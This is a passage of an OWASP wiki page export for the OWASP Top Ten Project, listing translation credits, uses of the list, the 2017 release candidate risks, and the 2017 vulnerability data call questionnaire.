*French 2013: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013%20-%20French.pdf OWASP Top 10 2013 - French PDF] Ludovic Petit: Ludovic.Petit@owasp.org, Sébastien Gioria: Sebastien.Gioria@owasp.org, Erwan Abgrall: g4l4drim@gmail.com, Benjamin Avet: benjamin.avet@gmail.com, Jocelyn Aubert: jocelyn.aubert@owasp.org, Damien Azambour: damien.azambourg@owasp.org, Aline Barthelemy: aline.barthelemy@fr.abb.com, Moulay Abdsamad Belghiti: abdsamad.belghiti@gmail.com, Gregory Blanc: gregory.blanc@gmail.com, Clément Capel: clement.capel@sfr.com, Etienne Capgras: Etienne.capgras@solucom.fr, Julien Cayssol: julien@aqwz.com, Antonio Fontes: antonio.fontes@owasp.org, Ely de Travieso: Ely.detravieso@owasp.org, Nicolas Grégoire: nicolas.gregoire@agarri.fr, Valérie Lasserre: valerie.lasserre@gmx.fr, Antoine Laureau: antoine.laureau@owasp.org, Guillaume Lopes: lopes.guillaume@free.fr, Gilles Morain: gilles.morain@gmail.com, Christophe Pekar: christophe.pekar@owasp.org, Olivier Perret: perrets@free.fr, Michel Prunet: michel.prunet@owasp.org, Olivier Revollat: revollat@gmail.com, Aymeric Tabourin: aymeric.tabourin@orange.com&lt;br /&gt;
* German 2013: [[media:OWASP_Top_10_2013_DE_Version_1_0.pdf | OWASP Top 10 2013 - German PDF]] top10@owasp.de which is Frank Dölitzscher, Torsten Gigler, Tobias Glemser, Dr. Ingo Hanke, Thomas Herzog, [[User:Kai_Jendrian|Kai Jendrian]], [[User:Ralf_Reinhardt|Ralf Reinhardt]], Michael Schäfer&lt;br /&gt;
* Hebrew 2013: [[OWASP_Top10_Hebrew|OWASP Top 10 2013 - Hebrew]] [https://www.owasp.org/images/1/1b/OWASP_Top_10_2013-Hebrew.pdf PDF] Translated by: Or Katz, Eyal Estrin, Oran Yitzhak, Dan Peled, Shay Sivan.&lt;br /&gt;
* Italian 2013: [https://www.owasp.org/images/c/c9/OWASP_Top_10_-_2013_-_Italiano.pdf OWASP Top 10 2013 - Italian PDF] Translated by: Michele Saporito: m.saporito7@gmail.com, Paolo Perego: thesp0nge@owasp.org, Matteo Meucci: matteo.meucci@owasp.org, Sara Gallo: sara.gallo@gmail.com, Alessandro Guido: alex@securityaddicted.com, Mirko Guido Spezie: mirko@dayu.it, Giuseppe Di Cesare: giuseppe.dicesare@alice.it, Paco Schiaffella: schiaffella@gmail.com, Gianluca Grasso: giandou@gmail.com, Alessio D'Ospina: alessiodos@gmail.com, Loredana Mancini: loredana.mancini@business-e.it, Alessio Petracca: alessio.petracca@gmail.com, Giuseppe Trotta: giutrotta@gmail.com, Simone Onofri: simone.onofri@gmail.com, Francesco Cossu: hambucker@gmail.com, Marco Lancini: marco.lancini.ml@gmail.com, Stefano Zanero: zanero@elet.polimi.it, Giovanni Schmid: giovanni.schmid@na.icar.cnr.it, Igor Falcomata': koba@sikurezza.org&lt;br /&gt;
*Japanese 2013: [https://www.owasp.org/images/7/79/OWASP_Top_10_2013_JPN.pdf OWASP Top 10 2013 - Japanese PDF] Translated by: Chia-Lung Hsieh: ryusuke.tw(at)gmail.com, Reviewed by: Hiroshi Tokumaru, Takanori Nakanowatari&lt;br /&gt;
* Korean 2013: [https://www.owasp.org/images/2/2c/OWASP_Top_10_-_2013_Final_-_Korean.pdf OWASP Top 10 2013 - Korean PDF] (이름가나다순) 김병효:byounghyo.kim@owasp.org, 김지원:jiwon.kim@owasp.or.kr, 김효근:katuri@katuri.kr, 박정훈:xelion@gmail.com, 성영모:youngmo.seong@owasp.or.kr, 성윤기:yune.sung@owasp.org, 송보영:boyoung.song@owasp.or.kr, 송창기:factor7@naver.com, 유정호:griphis77@gmail.com, 장상민:sangmin.jang@owasp.or.kr, 전영재:youngjae.jeon@owasp.org, 정가람:tgcarrot@gmail.com, 정홍순:jhs728@gmail.com, 조민재:johnny.cho@owasp.org,허성무:issimplenet@gmail.com&lt;br /&gt;
*Brazilian Portuguese 2013: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top_10_-_2013_Brazilian_Portuguese.pdf OWASP Top 10 2013 - Brazilian Portuguese PDF] Translated by: Carlos Serrão, Marcio Machry, Ícaro Evangelista de Torres, Carlo Marcelo Revoredo da Silva, Luiz Vieira, Suely Ramalho de Mello, Jorge Olímpia, Daniel Quintão, Mauro Risonho de Paula Assumpção, Marcelo Lopes, Caio Dias, Rodrigo Gularte&lt;br /&gt;
*Spanish 2013: [https://www.owasp.org/images/5/5f/OWASP_Top_10_-_2013_Final_-_Espa%C3%B1ol.pdf OWASP Top 10 2013 - Spanish PDF] Gerardo Canedo: gerardo.canedo@owasp.org, Jorge Correa: jacorream@gmail.com, Fabien Spychiger: fabien.spychiger@dreamlab.net, Alberto Hill: alberto.daniel.hill@gmail.com, Johnatan Stanley: johnatanst@gmail.com, Maximiliano Alonzo: malonzo@tib.com.uy, Mateo Martinez: mateo.martinez@owasp.org, David Montero: david.montero@owasp.org, Rodrigo Martinez: rodmart@fing.edu.uy, Guillermo Skrilec: guillermo.skrilec@owasp.org, Felipe Zipitria: felipe.zipitria@owasp.org, Fabien Spychiger: fabien.spychiger@dreamlab.net, Rafael Gil: rafael.gillarios@owasp.org, Christian Lopez: christian.lopez.martin@owasp.org, jonathan fernandez jonathan.fernandez04@gmail.com, Paola Rodriguez: Paola_R1@verifone.com, Hector Aguirre: hector.antonio.aguirre@owasp.org, Roger Carhuatocto: rcarhuatocto@intix.info, Juan Carlos Calderon: johnccr@yahoo.com, Marc Rivero López: mriverolopez@gmail.com, Carlos Allendes: carlos.allendes@owasp.org, daniel@carrero.cl: daniel@carrero.cl, Manuel Ramírez: manuel.ramirez.s@gmail.com, Marco Miranda: marco.miranda@owasp.org, Mauricio D. Papaleo Mayada: mpapaleo@gmail.com, Felipe Sanchez: felipe.sanchez@peritajesinformaticos.cl, Juan Manuel Bahamonde: juanmanuel.bahamonde@gmail.com, Adrià Massanet: adriamassanet@gmail.com, Jorge Correa: jacorream@gmail.com, Ramiro Pulgar: ramiro.pulgar@owasp.org, German Alonso Suárez Guerrero: german.suarez@owasp.org, Jose A. Guasch: jaguasch@gmail.com, Edgar Salazar: edgar.salazar@owasp.org&lt;br /&gt;
*Ukrainian 2013: [https://www.owasp.org/images/e/e3/OWASP_Top_10_-_2013_Final_Ukrainian.pdf OWASP Top 10 2013 - Ukrainian PDF] Kateryna Ovechenko, Yuriy Fedko, Gleb Paharenko, Yevgeniya Maskayeva, Sergiy Shabashkevich, Bohdan Serednytsky&lt;br /&gt;
&lt;br /&gt;
2010 Completed Translations:&lt;br /&gt;
&lt;br /&gt;
*Korean 2010: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Korean.pdf OWASP Top 10 2010 - Korean PDF] Hyungkeun Park, (mirrk1@gmail.com)&lt;br /&gt;
*Spanish 2010: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Spanish.pdf OWASP Top 10 2010 - Spanish PDF] *Daniel Cabezas Molina , Edgar Sanchez, Juan Carlos Calderon, Jose Antonio Guasch, Paulo Coronado, Rodrigo Marcos, Vicente Aguilera&lt;br /&gt;
*French 2010: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20French.pdf OWASP Top 10 2010 - French PDF] ludovic.petit@owasp.org, sebastien.gioria@owasp.org, antonio.fontes@owasp.org, benoit.guerette@owasp.org, Jocelyn.aubert@owasp.org, Eric.Garreau@gemalto.com, Guillaume.Huysmans@gemalto.com &lt;br /&gt;
*German: [[media:OWASPTop10_2010_DE_Version_1_0.pdf | OWASP Top 10 2010 - German PDF]] top10@owasp.de which is Frank Dölitzscher, Tobias Glemser, Dr. Ingo Hanke, [[User:Kai_Jendrian|Kai Jendrian]], [[User:Ralf_Reinhardt|Ralf Reinhardt]], Michael Schäfer&lt;br /&gt;
*Indonesian: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Indonesian.pdf OWASP Top 10 2010 - Indonesian PDF] Tedi Heriyanto (coordinator), Lathifah Arief, Tri A Sundara, Zaki Akhmad&lt;br /&gt;
*Italian: [https://www.owasp.org/images/f/f9/OWASP_Top_10_-_2010_ITA.pdf OWASP Top 10 2010 - Italian PDF] Simone Onofri, Paolo Perego, Massimo Biagiotti, Edoardo Viscosi, Salvatore Fiorillo, Roberto Battistoni, Loredana Mancini, Michele Nesta, Paco Schiaffella, Lucilla Mancini, Gerardo Di Giacomo, Valentino Squilloni&lt;br /&gt;
*Japanese: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Japanese-A4.pdf OWASP Top 10 2010 - Japanese PDF] cecil.su@owasp.org, Dr. Masayuki Hisada, Yoshimasa Kawamoto, Ryusuke Sakamoto, Keisuke Seki, Shin Umemoto, Takashi Arima&lt;br /&gt;
*Chinese: [https://www.owasp.org/images/a/a9/OWASP_Top_10_2010_Chinese_V1.0_Released.pdf OWASP Top 10 2010 - Chinese PDF] 感谢以下为中文版本做出贡献的翻译人员和审核人员: Rip Torn, 钟卫林, 高雯, 王颉, 于振东&lt;br /&gt;
*Vietnamese: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASPTop%2010%20-%202010%20Vietnamese.pdf OWASP Top 10 2010 - Vietnamese PDF] Translation lead by Cecil Su - Translation Team: Dang Hoang Vu, Nguyen Ba Tien, Nguyen Tang Hung, Luong Dieu Phuong, Huynh Thien Tam&lt;br /&gt;
*Hebrew: [[OWASP_Top10_Hebrew|OWASP Top 10 Hebrew Project]] -- [https://www.owasp.org/images/c/cd/OWASP_Top_10_Heb.pdf OWASP Top 10 2010 - Hebrew PDF]. Lead by Or Katz, see translation page for list of contributors.&lt;br /&gt;
&lt;br /&gt;
= Project Details =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{{:GPC_Project_Details/OWASP_Top10 | OWASP Project Identification Tab}}&lt;br /&gt;
&lt;br /&gt;
= Some Commercial &amp;amp; OWASP Uses of the Top 10 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Warning''': these articles have not been rated for accuracy by OWASP. Product companies should be extremely careful about claiming to &amp;quot;cover&amp;quot; or &amp;quot;ensure compliance&amp;quot; with the OWASP Top 10. The current state-of-the-art for automated detection (scanners and static analysis) and prevention (WAF) is nowhere near sufficient to claim adequate coverage of the issues in the Top 10. Nevertheless, using the Top 10 as a simple way to communicate security to end users is effective. &lt;br /&gt;
&lt;br /&gt;
;[https://blogs.microsoft.com/microsoftsecure/2008/05/01/sdl-and-the-owasp-top-ten/ Microsoft] &lt;br /&gt;
:as a way to measure the coverage of their SDL and improve security&lt;br /&gt;
&lt;br /&gt;
;[https://www.pcisecuritystandards.org/index.shtml PCI Council] &lt;br /&gt;
:as part of the Payment Card Industry Data Security Standard (PCI DSS)&lt;br /&gt;
&lt;br /&gt;
;[http://msdn.microsoft.com/en-us/library/dd129898.aspx Microsoft] &lt;br /&gt;
:to show how &amp;quot;T10 threats are handled by the security design and test procedures of Microsoft&amp;quot;&lt;br /&gt;
&lt;br /&gt;
;[[OWASP_Top_10/Mapping_to_WHID | OWASP]]&lt;br /&gt;
:OWASP Top 10 Mapped to the Web Hacking Incident Database&lt;br /&gt;
&lt;br /&gt;
;[[OWASP_Mobile_Security_Project#tab=Top_Ten_Mobile_Risks | OWASP]]&lt;br /&gt;
:OWASP Mobile Top 10 Risks&lt;br /&gt;
&lt;br /&gt;
;[[OWASP_Top_Ten_Cheat_Sheet | OWASP]]&lt;br /&gt;
:OWASP Top 10 Cheat Sheet&lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project]] [[Category:OWASP_Document]] [[Category:OWASP_Download]] [[Category:OWASP_Release_Quality_Document]][[Category:Popular]][[Category:SAMM-EG-1]]&lt;/div&gt;</summary>
		<author><name>ErezYalon</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Top_Ten_Project&amp;diff=231500</id>
		<title>Category:OWASP Top Ten Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Top_Ten_Project&amp;diff=231500"/>
				<updated>2017-07-10T14:20:50Z</updated>
		
		<summary type="html">&lt;p&gt;ErezYalon: Fixed typo - &amp;quot;Top 10&amp;quot; instead of &amp;quot;Top 20&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:90px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File: flagship_big.jpg|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Flagship_Projects]]&amp;lt;/div&amp;gt;&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==OWASP Top 10 - 2017 Release Candidate ==&lt;br /&gt;
&lt;br /&gt;
The release candidate for public comment was published 10 April 2017 and can be [https://github.com/OWASP/Top10/raw/master/2017/OWASP%20Top%2010%20-%202017%20RC1-English.pdf downloaded here]. OWASP plans to release the final OWASP Top 10 - 2017 in July or August 2017 after a public comment period ending June 30, 2017.&lt;br /&gt;
&lt;br /&gt;
Constructive comments on this [https://github.com/OWASP/Top10/raw/master/2017/OWASP%20Top%2010%20-%202017%20RC1-English.pdf OWASP Top 10 - 2017 Release Candidate] should be forwarded via email to the [https://lists.owasp.org/mailman/listinfo/Owasp-topten OWASP Top 10 Project Email List]. Private comments may be sent to [mailto:vanderaj@owasp.org Andrew van der Stock]. Anonymous comments are welcome. All non-private comments will be catalogued and published at the same time as the final public release. Comments recommending changes to the Top 10 should include a complete suggested list of changes, along with a rationale for each change. All comments should indicate the specific relevant page and section.&lt;br /&gt;
&lt;br /&gt;
==OWASP Top 10 Most Critical Web Application Security Risks==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list.&lt;br /&gt;
&lt;br /&gt;
We urge all companies to adopt this awareness document within their organization and start the process of ensuring that their web applications minimize these risks. Adopting the OWASP Top 10 is perhaps the most effective first step towards changing the software development culture within your organization into one that produces secure code.&lt;br /&gt;
&lt;br /&gt;
==Translation Efforts==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 has been translated to many different languages by numerous volunteers. These translations are available as follows:&lt;br /&gt;
&lt;br /&gt;
* [[Top10#OWASP_Top_10_for_2013 | All versions of the OWASP Top 10 - 2013]]&lt;br /&gt;
* [[Top10#OWASP_Top_10_for_2010 | All versions of the OWASP Top 10 - 2010]]&lt;br /&gt;
* [[Top10#Translation_Efforts_2 | Information about the various translation teams]]&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
The OWASP Top 10 is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license, so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
{{Social Media Links}}&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== What is the OWASP Top 10? ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 provides:&lt;br /&gt;
&lt;br /&gt;
* '''A list of the 10 Most Critical Web Application Security Risks'''&lt;br /&gt;
&lt;br /&gt;
For each Risk it provides:&lt;br /&gt;
* A description&lt;br /&gt;
* Example vulnerabilities&lt;br /&gt;
* Example attacks&lt;br /&gt;
* Guidance on how to avoid&lt;br /&gt;
* References to OWASP and other related resources&lt;br /&gt;
&lt;br /&gt;
== Project Leader ==&lt;br /&gt;
&lt;br /&gt;
* [[User:vanderaj | Andrew van der Stock]]&lt;br /&gt;
* [[User:Neil_Smithline | Neil Smithline]]&lt;br /&gt;
* [[User:T.Gigler | Torsten Gigler]]&lt;br /&gt;
&lt;br /&gt;
== Related Projects ==&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Mobile_Security_Project#Top_Ten_Mobile_Risks | OWASP Mobile Top 10 Risks]]&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Top_Ten_Cheat_Sheet | OWASP Top 10 Cheat Sheet]]&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Proactive_Controls | Top 10 Proactive Controls]]&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Top_10/Mapping_to_WHID | OWASP Top 10 Mapped to the Web Hacking Incident Database]]&lt;br /&gt;
&lt;br /&gt;
== Ohloh ==&lt;br /&gt;
&lt;br /&gt;
*https://www.ohloh.net/p/OWASP-Top-10&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== Quick Download ==&lt;br /&gt;
* [https://github.com/OWASP/Top10/raw/master/2017/OWASP%20Top%2010%20-%202017%20RC1-English.pdf OWASP Top 10 2017 Release Candidate - PDF]&lt;br /&gt;
* [[Media:OWASP_Top_10_-_2013.pdf | OWASP Top 10 2013 - PDF]]&lt;br /&gt;
* [[Top_10_2013 | OWASP Top 10 2013 - wiki]]&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top-10_2013%20-%20Presentation.pptx OWASP Top 10 2013 Presentation - Covering Each Item in the Top 10 (PPTX)].&lt;br /&gt;
&lt;br /&gt;
== Email List ==&lt;br /&gt;
[https://lists.owasp.org/mailman/listinfo/Owasp-topten Project Email List]&lt;br /&gt;
&lt;br /&gt;
== News and Events ==&lt;br /&gt;
* [10 Apr 2017] OWAP Top 10 - 2017 Release Candidate Published&lt;br /&gt;
* [17 Dec 2016] OWASP Top 10 - 2017 Data Call Data Published&lt;br /&gt;
* [20 May 2016] OWASP Top 10 - 2017 Data Call Announced&lt;br /&gt;
* [12 Jun 2013] OWASP Top 10 - 2013 Final Released&lt;br /&gt;
* [Feb 2013] OWASP Top 10 - 2013 - Release Candidate Published&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-flagship-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Flagship_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-defenders-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_DOC.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= OWASP Top 10 for 2017 Release Candidate =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The release candidate for public comment was published 10 April 2017 and can be [https://github.com/OWASP/Top10/raw/master/2017/OWASP%20Top%2010%20-%202017%20RC1-English.pdf downloaded here.]. OWASP plans to release the final OWASP Top 10 - 2017 in July or August 2017 after a public comment period ending June 30, 2017.&lt;br /&gt;
&lt;br /&gt;
Constructive comments on this [https://github.com/OWASP/Top10/raw/master/2017/OWASP%20Top%2010%20-%202017%20RC1-English.pdf OWASP Top 10 - 2017 Release Candidate] should be forwarded via email to the [https://lists.owasp.org/mailman/listinfo/Owasp-topten OWASP Top 10 Project Email List]. Private comments may be sent to [mailto:vanderaj@owasp.org Andrew van der Stock]. Anonymous comments are welcome. All non-private comments will be catalogued and published at the same time as the final public release. Comments recommending changes to the Top 10 should include a complete suggested list of changes, along with a rationale for each change. All comments should indicate the specific relevant page and section.&lt;br /&gt;
&lt;br /&gt;
This release of the OWASP Top 10 marks this project’s fourteenth year of raising awareness of the importance of application security risks. This release follows the 2013 update, whose main change was the addition of 2013-A9 Use of Known Vulnerable Components. We are pleased to see that since the 2013 Top 10 release, a whole ecosystem of both free and commercial tools have emerged to help combat this problem as the use of open source components has continued to rapidly expand across practically every programming language. The data also suggests the use of known vulnerable components is still prevalent, but not as widespread as before. We believe the awareness of this issue the Top 10 - 2013 generated has contributed to both of these changes.&lt;br /&gt;
&lt;br /&gt;
We also noticed that since CSRF was introduced to the Top 10 in 2007, it has dropped from a widespread vulnerability to an uncommon one. Many frameworks include automatic CSRF defenses which has significantly contributed to its decline in prevalence, along with much higher awareness with developers that they must protect against such attacks.&lt;br /&gt;
&lt;br /&gt;
For 2017, the OWASP Top 10 Most Critical Web Application Security Risks (in the Release Candidate) are:&lt;br /&gt;
&lt;br /&gt;
* A1 Injection&lt;br /&gt;
* A2 Broken Authentication and Session Management&lt;br /&gt;
* A3 Cross-Site Scripting (XSS)&lt;br /&gt;
* A4 Broken Access Control (As it was in 2004)&lt;br /&gt;
* A5 Security Misconfiguration&lt;br /&gt;
* A6 Sensitive Data Exposure&lt;br /&gt;
* A7 Insufficient Attack Protection (NEW)&lt;br /&gt;
* A8 Cross-Site Request Forgery (CSRF)&lt;br /&gt;
* A9 Using Components with Known Vulnerabilities&lt;br /&gt;
* A10 Underprotected APIs (NEW)&lt;br /&gt;
&lt;br /&gt;
== 2017 Update Data Call Data ==&lt;br /&gt;
&lt;br /&gt;
DATA CALL RESULTS ARE NOW PUBLIC: The [https://github.com/OWASP/Top10/blob/master/2017/datacall/OWASP%20Top%2010%20-%202017%20Data%20Call-Public%20Release.xlsx?raw=true results of this data call have been made public here] as an Excel spreadsheet with 4 tabs. Three of the tabs have raw data as submitted, organized into three vulnerability data size categories: large, small, and none. A 4th tab includes some basic analysis of the large size submissions. The OWASP Top 10 project thanks all the submitters for their input to the OWASP Top 10 - 2017.&lt;br /&gt;
&lt;br /&gt;
On May 20, 2016, the Top 10 project made a public announcement of the data call for the 2017 update to the OWASP Top 10. Contributors filled out the Google form posted here:  [https://docs.google.com/forms/d/1sBMHN5nBicjr5xSo04xkdP5JlCnXFcKFCgEHjwPGuLw/viewform?c=0&amp;amp;w=1&amp;amp;usp=mail_form_link OWASP Top 10 - 2017 Data Call], which had the questions listed below.&lt;br /&gt;
&lt;br /&gt;
Page 1 of 5: Submitter Info&lt;br /&gt;
&lt;br /&gt;
* Name of Company/Organization *&lt;br /&gt;
* Company/Organization Web Site *&lt;br /&gt;
* Point of Contact Name *&lt;br /&gt;
* Point of Contact E-Mail *&lt;br /&gt;
&lt;br /&gt;
Page 2 of 5: Background on Applications&lt;br /&gt;
&lt;br /&gt;
* During what year(s) was this data collected? *&lt;br /&gt;
** 2014&lt;br /&gt;
** 2015&lt;br /&gt;
** Both 2014 &amp;amp; 2015&lt;br /&gt;
*** If the application vulnerability data you are submitting was extracted from a publicly available report, please provide a link to that report (or reports), and the relevant page number(s)&lt;br /&gt;
&lt;br /&gt;
* How many web applications do the submitted results cover? * We consider web apps, web services, and the server side of mobile apps to all be web apps.&lt;br /&gt;
&lt;br /&gt;
* What were the primary programming languages the applications you reviewed written in? Primary being 5% or more of the supplied results - Check all that apply&lt;br /&gt;
** Java&lt;br /&gt;
** .NET&lt;br /&gt;
** Python&lt;br /&gt;
** PHP&lt;br /&gt;
** Ruby&lt;br /&gt;
** Grails&lt;br /&gt;
** Play&lt;br /&gt;
** Node.js&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
* Please supply the exact percentage of applications per language checked off above:&lt;br /&gt;
&lt;br /&gt;
* What were the primary industries these applications supported? Primary being 5% or more of the supplied results - Check all that apply&lt;br /&gt;
** Financial&lt;br /&gt;
** Healthcare&lt;br /&gt;
** eCommerce&lt;br /&gt;
** Internet/Social Media&lt;br /&gt;
** Airline&lt;br /&gt;
** Energy&lt;br /&gt;
** Entertainment (Games/Music/Movies)&lt;br /&gt;
** Government&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
* Where in the world were the application owners primarily? Again - select those where 5% or more of your results came from&lt;br /&gt;
** North America&lt;br /&gt;
** Europe&lt;br /&gt;
** AsiaPac&lt;br /&gt;
** South America&lt;br /&gt;
** Middle East&lt;br /&gt;
** Africa&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
Page 3 of 5: Assessment Team and Detection Approach&lt;br /&gt;
&lt;br /&gt;
* What type of team did the bulk of this work? *&lt;br /&gt;
** Internal Assessment Team(s)&lt;br /&gt;
** Consulting Organization&lt;br /&gt;
** Product Vendor/Service Provider (e.g., SaaS)&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
*What type of analysis tools do they use? * Check all that apply.&lt;br /&gt;
** Free/Open Source Static Application Security Testing (SAST) Tools&lt;br /&gt;
** Free/Open Source Dynamic Application Security Testing (DAST) Tools&lt;br /&gt;
** Free/Open Source Interactive Application Security Testing (IAST) Tools&lt;br /&gt;
** Commercial Static Application Security Testing (SAST) Tools&lt;br /&gt;
** Commercial Dynamic Application Security Testing (DAST) Tools&lt;br /&gt;
** Commercial Interactive Application Security Testing (IAST) Tools&lt;br /&gt;
** Commercial DAST/IAST Hybrid Analysis Tools&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
* Which analysis tools do you frequently use? This includes both free, commercial, and custom (in house) tools - List tools by name&lt;br /&gt;
&lt;br /&gt;
* What is your primary assessment methodology? * Primary being the majority of your assessments follow this approach&lt;br /&gt;
** Raw (untriaged) output of automated analysis tool results using default rules&lt;br /&gt;
** Automated analysis tool results - with manual false positive analysis/elimination&lt;br /&gt;
** Output from manually tailored automated analysis tool(s)&lt;br /&gt;
** Output from manually tailored automated analysis tool(s) - with manual false positive analysis/elimination&lt;br /&gt;
** Manual expert penetration testing (Expected to be tool assisted w/ free DAST tool(s))&lt;br /&gt;
** Manual expert penetration testing with commercial DAST tool(s)&lt;br /&gt;
** Manual expert code review (Using IDE and other free code review aids)&lt;br /&gt;
** Manual expert code review with commercial SAST tool(s)&lt;br /&gt;
** Combined manual expert code review and penetration testing with only free tools&lt;br /&gt;
** Combined manual expert code review and penetration testing with only commercial tools&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
Page 4 of 5: Application Vulnerability Data&lt;br /&gt;
&lt;br /&gt;
Each question asks the number of vulnerabilities found for a particular type of vulnerability. At the end, is one catch all text question where you can add other types of vulnerabilities and their counts. If you prefer, just send your vulnerability data in a spreadsheet to brian.glas@owasp.org with these columns: CATEGORY NAME, CWE #, COUNT after you submit the rest of your input via this data call. ideally it would come from the email address you specified in the Point of Contact E-Mail question on Page 1 so its easy to correlate the two.&lt;br /&gt;
&lt;br /&gt;
* Number of SQL Injection Vulnerabilities Found (CWE-89)?&lt;br /&gt;
* Number of Hibernate Injection Vulnerabilities Found (CW-564)?&lt;br /&gt;
* Number of Command Injection Vulnerabilities Found (CWE-77)?&lt;br /&gt;
* Number of Authentication Vulnerabilities Found (CWE-287)?&lt;br /&gt;
* Number of Session Fixation Vulnerabilities Found (CWE-384)?&lt;br /&gt;
* Number of Cross-Site Scripting (XSS) Vulnerabilities Found (CWE-79)?&lt;br /&gt;
* Number of DOM-Based XSS Vulnerabilities Found (No CWE)?&lt;br /&gt;
* Number of Insecure Direct Object Reference Vulnerabilities Found (CWE-639)?&lt;br /&gt;
* Number of Path Traversal Vulnerabilities Found (CWE-22)?&lt;br /&gt;
* Number of Missing Authorization Vulnerabilities Found (CWE-285)?&lt;br /&gt;
* Number of Security Misconfiguration Vulnerabilities Found (CWE-2)?&lt;br /&gt;
* Number of Cleartext Transmission of Sensitive Information Vulnerabilities Found (CWE-319)?&lt;br /&gt;
* Number of Cleartext Storage of Sensitive Information Vulnerabilities Found (CWE-312)?&lt;br /&gt;
